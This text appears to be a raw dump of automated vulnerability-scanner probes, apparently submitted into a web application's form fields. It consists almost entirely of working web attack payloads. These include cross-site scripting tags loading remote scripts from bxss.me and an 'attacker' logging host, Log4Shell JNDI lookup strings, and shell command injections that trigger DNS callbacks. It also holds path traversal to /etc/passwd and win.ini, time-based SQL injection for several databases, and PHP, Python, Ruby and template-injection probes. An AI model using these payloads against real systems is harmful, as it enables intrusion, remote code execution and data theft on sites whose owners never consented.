%35%35%35%3C%53%63%52%69%50%74%20%3E%4C%42%61%32%289979%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\LBa2(9244)\u003C/sCripT\u003E
555
555<ScRiPt>LBa2(9207)</sCripT>
555
%F6<img zzz onmouseover=LBa2(93381) //%F6>
555
555<input autofocus onfocus=LBa2(9853)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555
555}body{zzz:Expre/**/SSion(LBa2(9552))}
555
555hdD9P
<ScRiPt >LBa2(9318)</ScRiPt>
555<WTAHTL>QYNYK[!+!]</WTAHTL>
555
555<ifRAme sRc=9651.com></IfRamE>
555
555<alrrX0Y x=9836>
555
555
555<img sRc='http://attacker-9863/log.php?
555
555<aJyKbzK<
555
555'"()&%<zzz><ScRiPt >eX8k(9971)</ScRiPt>
555
'"()&%<zzz><ScRiPt >eX8k(9695)</ScRiPt>
555
555
5559908495
555
555
555
${j${::-n}di:dns${::-:}${::-/}/hitzhbmjmyhui46c82${::-.}bxss.me}zzzz
response.write(9812858*9735914)
'+response.write(9812858*9735914)+'
555
"+response.write(9812858*9735914)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitigmrmjmotw326df${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
555
555
555
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-102895.1141.0d77d${::-.}1${::-.}bxss.me}}
555
555
555
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-102896&h=1141-0d77d-2&"></script>
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
555
echo lbnndv$()\ fdirhp\nz^xyu||a #' &echo lbnndv$()\ fdirhp\nz^xyu||a #|" &echo lbnndv$()\ fdirhp\nz^xyu||a #
giVNs3qs
&echo judubh$()\ nlsyuu\nz^xyu||a #' &echo judubh$()\ nlsyuu\nz^xyu||a #|" &echo judubh$()\ nlsyuu\nz^xyu||a #
555
|echo kgovdj$()\ iijxzs\nz^xyu||a #' |echo kgovdj$()\ iijxzs\nz^xyu||a #|" |echo kgovdj$()\ iijxzs\nz^xyu||a #
(nslookup hitxglmnpybhu53fbe.bxss.me||perl -e "gethostbyname('hitxglmnpybhu53fbe.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
$(nslookup hituipkoxaobzf8101.bxss.me||perl -e "gethostbyname('hituipkoxaobzf8101.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
&(nslookup hitcdzcxazeigcd49f.bxss.me||perl -e "gethostbyname('hitcdzcxazeigcd49f.bxss.me')")&'\"`0&(nslookup hitcdzcxazeigcd49f.bxss.me||perl -e "gethostbyname('hitcdzcxazeigcd49f.bxss.me')")&`'
555
555
bcc:074625.1141-103013.1141.0d77d.19250.2@bxss.me
../555
to@example.com>
bcc:074625.1141-103014.1141.0d77d.19250.2@bxss.me
555
|(nslookup hitgsszbwugps44d0f.bxss.me||perl -e "gethostbyname('hitgsszbwugps44d0f.bxss.me')")
555
555
555
555
`(nslookup hittmaeztohkf82fb5.bxss.me||perl -e "gethostbyname('hittmaeztohkf82fb5.bxss.me')")`
555
555
555
;(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")|(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")&(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")
555<esi:include src="http://bxss.me/rpb.png"/>
555
${9999349+9999910}
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
555&n906428=v987254
)
/etc/shells
555
!(()&&!|*|*|
555
c:/windows/win.ini
-1 OR 2+814-814-1=0+0+0+1 --
^(#$!@#$)(()))******
555
bxss.me
-1 OR 2+932-932-1=0+0+0+1
555
555
555
555
-1' OR 2+924-924-1=0+0+0+1 --
555
-1' OR 2+431-431-1=0+0+0+1 or 'pM2lqwbO'='
555
555
555
-1" OR 2+848-848-1=0+0+0+1 --
555
555
555
555
555
555
'.gethostbyname(lc('hitdk'.'lrgtndtwe1417.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(65).chr(113).chr(83).'
".gethostbyname(lc("hitij"."fasivlin7b86a.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(86).chr(108).chr(77)."
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
'"()
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555'&&sleep(27*1000)*gmuyyd&&'
555
555"&&sleep(27*1000)*ohlyjs&&"
555
555'||sleep(27*1000)*xmsbfp||'
555
555"||sleep(27*1000)*wwckbx||"
555
555
555
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwmchrgdjlk5206c.'+'bxss.me')
555
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwmchrgdjlk5206c."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwmchrgdjlk5206c.'+'bxss.me')+"
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(89).concat(112).concat(86)+(require"socket"
Socket.gethostbyname("hitqe"+"mzgvshrab1b25.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(101).concat(81).concat(107).concat(80)+(require'socket'
Socket.gethostbyname('hitbi'+'zsuvkunl7a291.bxss.me.')[3].to_s)+'
about-nopcommerce
555
about-nopcommerce/.
555
http://hitsvyibficyi.bxss.me/
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
/xfs.bxss.me
'"
555
555
555
<!--
555'"()&%<zzz><ScRiPt >tsSs(9215)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >tsSs(9556)</ScRiPt>
555
555
555
555
5559665567
555
bfg3344<s1﹥s2ʺs3ʹhjl3344
bfgx8337%C0%BEz1%C0%BCz2a%90bcxhjl8337
<%={{={@{#{${dfb}}%>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<ScRiPt >tsSs(9522)</ScRiPt>
555<WDEMXK>SVAQD[!+!]</WDEMXK>
555<script>tsSs(9962)</script>
555<ScR<ScRiPt>IpT>tsSs(9452)</sCr<ScRiPt>IpT>
555<ScRiPt
>tsSs(9957)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9534></ScRiPt>
-1; waitfor delay '0:0:15' --
555<isindex type=image src=1 onerror=tsSs(9990)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9041'>
555<body onload=tsSs(9502)>
555<img src=//xss.bxss.me/t/dot.gif onload=tsSs(9704)>
555<img src=xyz OnErRor=tsSs(9506)>
555<img/src=">" onerror=alert(9933)>
-1); waitfor delay '0:0:15' --
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%73%53%73%289906%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\tsSs(9117)\u003C/sCripT\u003E
555<ScRiPt>tsSs(9111)</sCripT>
%F6<img zzz onmouseover=tsSs(99261) //%F6>
555<input autofocus onfocus=tsSs(9073)>
<a HrEF=http://xss.bxss.me></a>
-1)); waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(tsSs(9954))}
555ZK0td
<ScRiPt >tsSs(9791)</ScRiPt>
555<WVSKBR>60FC0[!+!]</WVSKBR>
555<ifRAme sRc=9112.com></IfRamE>
555<aX47a7n x=9391>
1 waitfor delay '0:0:15' --
555<img sRc='http://attacker-9978/log.php?
555<aEuOm6g<
555
555
555
555
0fTQzrAP'; waitfor delay '0:0:15' --
555
555
555
555
555
nsobPinl'); waitfor delay '0:0:15' --
555
555
555
555
555
555
M4jbISmY')); waitfor delay '0:0:15' --
555
555
555
555
-5 OR 431=(SELECT 431 FROM PG_SLEEP(15))--
555
555
555
555
555
555
-5) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
555
555
555
555
555
555
-1)) OR 786=(SELECT 786 FROM PG_SLEEP(15))--
555
555
555
555
555
HTkPKEts' OR 444=(SELECT 444 FROM PG_SLEEP(15))--
555
555
555
555
jXrmsn5p') OR 405=(SELECT 405 FROM PG_SLEEP(15))--
xKyGOsM4')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@kfJu3
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555


555
555
555'"()&%<zzz><ScRiPt >GT4O(9046)</ScRiPt>
555'"()&%<zzz><ScRiPt >Y4YM(9500)</ScRiPt>
555
'"()&%<zzz><ScRiPt >Y4YM(9881)</ScRiPt>
'"()&%<zzz><ScRiPt >GT4O(9834)</ScRiPt>
555
5559179902
5559734266
555
bfg10997<s1﹥s2ʺs3ʹhjl10997
bfg7842<s1﹥s2ʺs3ʹhjl7842
555
bfgx6186%C0%BEz1%C0%BCz2a%90bcxhjl6186
bfgx5685%C0%BEz1%C0%BCz2a%90bcxhjl5685
555
<%={{={@{#{${dfb}}%>
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >Y4YM(9124)</ScRiPt>
555<ScRiPt >GT4O(9563)</ScRiPt>
555
555<WSNVGW>2GJDL[!+!]</WSNVGW>
555<W6PNIU>XQEQN[!+!]</W6PNIU>
555
555<script>Y4YM(9649)</script>
555<script>GT4O(9507)</script>
555
555<ScR<ScRiPt>IpT>GT4O(9548)</sCr<ScRiPt>IpT>
555<ScR<ScRiPt>IpT>Y4YM(9450)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>GT4O(9996)</ScRiPt>
555<ScRiPt
>Y4YM(9298)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9188></ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9743></ScRiPt>
555<isindex type=image src=1 onerror=GT4O(9760)>
555<isindex type=image src=1 onerror=Y4YM(9492)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9314'>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9134'>
555
555<body onload=GT4O(9353)>
555<body onload=Y4YM(9628)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=GT4O(9576)>
555<img src=//xss.bxss.me/t/dot.gif onload=Y4YM(9792)>
555
555<img src=xyz OnErRor=GT4O(9190)>
555
555<img src=xyz OnErRor=Y4YM(9718)>
555<img/src=">" onerror=alert(9065)>
555
555<img/src=">" onerror=alert(9375)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%47%54%34%4F%289082%29%3C%2F%73%43%72%69%70%54%3E
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%59%34%59%4D%289987%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\Y4YM(9722)\u003C/sCripT\u003E
555\u003CScRiPt\GT4O(9397)\u003C/sCripT\u003E
555
555<ScRiPt>Y4YM(9382)</sCripT>
555<ScRiPt>GT4O(9945)</sCripT>
%F6<img zzz onmouseover=Y4YM(95931) //%F6>
555
%F6<img zzz onmouseover=GT4O(90191) //%F6>
555<input autofocus onfocus=GT4O(9555)>
555<input autofocus onfocus=Y4YM(9810)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(GT4O(9258))}
555}body{zzz:Expre/**/SSion(Y4YM(9803))}
555
555iU1XP
<ScRiPt >GT4O(9788)</ScRiPt>
555kblrK
<ScRiPt >Y4YM(9078)</ScRiPt>
555
555<WLQDQU>LDAZO[!+!]</WLQDQU>
555<WQ8WPH>CLKIY[!+!]</WQ8WPH>
555
555<ifRAme sRc=9765.com></IfRamE>
555<ifRAme sRc=9439.com></IfRamE>
555
555<aHlEwOz x=9632>
555<a8NUBPN x=9834>
555
555<img sRc='http://attacker-9663/log.php?
555<img sRc='http://attacker-9867/log.php?
555
555<aJGLBQf<
555<aDjT2FY<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >Q11f(9631)</ScRiPt>
555
'"()&%<zzz><ScRiPt >Q11f(9564)</ScRiPt>
555
5559041887
555
bfg4070<s1﹥s2ʺs3ʹhjl4070
555
bfgx9501%C0%BEz1%C0%BCz2a%90bcxhjl9501
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >Q11f(9333)</ScRiPt>
555
555<WCABO4>SS2GM[!+!]</WCABO4>
555
555<script>Q11f(9561)</script>
555
555<ScR<ScRiPt>IpT>Q11f(9651)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>Q11f(9925)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9216></ScRiPt>
555
555<isindex type=image src=1 onerror=Q11f(9724)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9700'>
555
555<body onload=Q11f(9367)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=Q11f(9231)>
555
555<img src=xyz OnErRor=Q11f(9572)>
555
555<img/src=">" onerror=alert(9476)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%51%31%31%66%289392%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\Q11f(9760)\u003C/sCripT\u003E
555
555<ScRiPt>Q11f(9234)</sCripT>
555
%F6<img zzz onmouseover=Q11f(99111) //%F6>
555
555<input autofocus onfocus=Q11f(9385)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(Q11f(9559))}
555
555hWSSF
<ScRiPt >Q11f(9912)</ScRiPt>
555
555<W9IHRE>TJQPM[!+!]</W9IHRE>
555
555<ifRAme sRc=9158.com></IfRamE>
555
555<awxJb1p x=9272>
555
555<img sRc='http://attacker-9084/log.php?
555
555<a3XVixU<
555